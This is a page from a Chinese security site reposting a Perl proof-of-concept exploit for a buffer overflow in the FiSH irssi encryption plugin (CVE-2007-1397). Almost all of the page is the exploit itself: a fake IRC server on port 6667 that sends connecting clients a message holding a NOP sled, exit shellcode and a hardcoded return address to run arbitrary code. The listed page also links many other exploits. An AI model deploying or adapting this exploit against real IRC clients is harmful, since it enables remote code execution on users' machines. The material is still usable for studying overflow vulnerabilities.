首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FiSH-irssi v0.99 Evil ircd Buffer Overflow (CVE-2007-1397)
来源:vfocus.net 作者:DeLisle 发布时间:2011-04-18  

# FiSH IRC encryption evil ircd PoC exploit.
# Abuses CVE-2007-1397
# Bad ircd, nasty bnc provider, nicknames over 100 char --> ruin.
# Runs arbitrary code which which in this case shuts down irssi.
# Tested on my own compiled FiSH with irssi/fedora/x86
# There are a lot more problems like this one, you should /unload fish
# Caleb James DeLisle - cjd

use Socket;

$retPtr = "\x60\xef\xff\xbf";

# Pirated from some guy called gunslinger_
$exit1code = "\x31\xc0\xb0\x01\x31\xdb\xcd\x80";

$code = "\x90" x 120 . $exit1code . $retPtr;

socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or die "Couldn't open socket";
bind(SOCKET, sockaddr_in(6667, inet_aton("127.0.0.1"))) or die "Couldn't bind to port 6667";
listen(SOCKET,5) or die "Couldn't listen on port";

while(accept(CLIENT,SOCKET)){
    sleep 1;
    select((select(CLIENT), $|=1)[0]);
    print CLIENT ":-psyBNC!~cjd\@ef.net PRIVMSG luser : :($code\r\n";
}
close(SOCKET);


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MS Word Record Parsing Buffer
·Adobe Flash Player 10.2.153.1
·SimplyPlay v.66 .pls File Buff
·Wireshark 1.4.1-1.4.4 SEH Over
·NEdit 5.5 Format String Vulner
·Winamp 5.6.1 .pls Remote Comma
·Wireshark <= 1.4.4 packet-dect
·Winamp 5.6.1 Denial Of Service
·Adobe Flash Player < 10.1.53 .
·Media Player Classic 6.4.9.1 D
·IBM Tivoli Directory Server SA
·Xilisoft Video Converter Ultim
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved